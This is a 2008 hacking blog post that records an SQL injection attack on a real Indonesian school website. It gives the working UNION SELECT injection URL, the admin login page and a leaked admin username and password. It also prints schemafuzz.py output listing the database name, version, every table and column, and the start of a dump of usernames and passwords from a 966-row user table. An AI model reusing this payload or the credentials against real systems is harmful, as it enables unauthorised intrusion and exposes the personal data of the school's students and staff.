viperfx07 is here to blog about hacking, cracking, website, application, android, and many more.

Wednesday, October 15, 2008

[SQLi] http://sman1-boyolali.com

5:05 PM Posted by viperfx07


Tool --> schemafuzz.py v5.0
Admin login page --> http://sman1-boyolali.com/admin/
Admin usr:pwd --> admin:mastar1234
Dump:
[+] URL:http://sman1-boyolali.com/detailberita.php?id=6+AND+1=2+UNION+SELECT+0,sqli,2,3,4,5,6,7,8--
[+] Evasion Used: "+" "--"
[+] 12:40:16
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: sman1bo_smanbo
User: sman1bo@localhost
Version: 5.0.51a-community

[Database]: sman1bo_smanbo
[Table: Columns]
[0]admin: idadmin,username,password
[1]artikel: idartikel,idkategori,judul,isi_artikel,penulis,namapenulis,jam,tanggal,publik
[2]file: idfile,namafile,tanggal,jam,file,username,nama,keterangan
[3]gallery: idphoto,namaphoto,tanggal,jam,photo,keterangan
[4]guestbook: no_gb,nama,tanggal,jam,email,isi_gb
[5]kategori: idkategori,isi_kategori
[6]link: idlink,namalink,alamatweb
[7]polling: id_polling,tanggal,pertanyaan,A,B,C,D,E,jawabanA,jawabanB,jawabanC,jawabanD,jawabanE
[8]profil: idprofil,halaman,isi_halaman,tanggal,jam
[9]salam: idsalam,isi_salam,jam,tanggal
[10]user: iduser,username,nama,nmortu,password,status,photo,tempat_lahir,tgl_lahir,jk,th_masuk,alamat,telp,email,salam,ket

[-] [12:42:43]
[-] Total URL Requests 77
[-] Done

[+] URL:http://sman1-boyolali.com/detailberita.php?id=6+AND+1=2+UNION+SELECT+0,sqli,2,3,4,5,6,7,8--
[+] Evasion Used: "+" "--"
[+] 12:44:45
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: sman1bo_smanbo
User: sman1bo@localhost
Version: 5.0.51a-community
[+] Dumping data from database "sman1bo_smanbo" Table "user"
[+] Column(s) ['username', 'password']
[+] Number of Rows: 966

-----cut here coz it's too many---
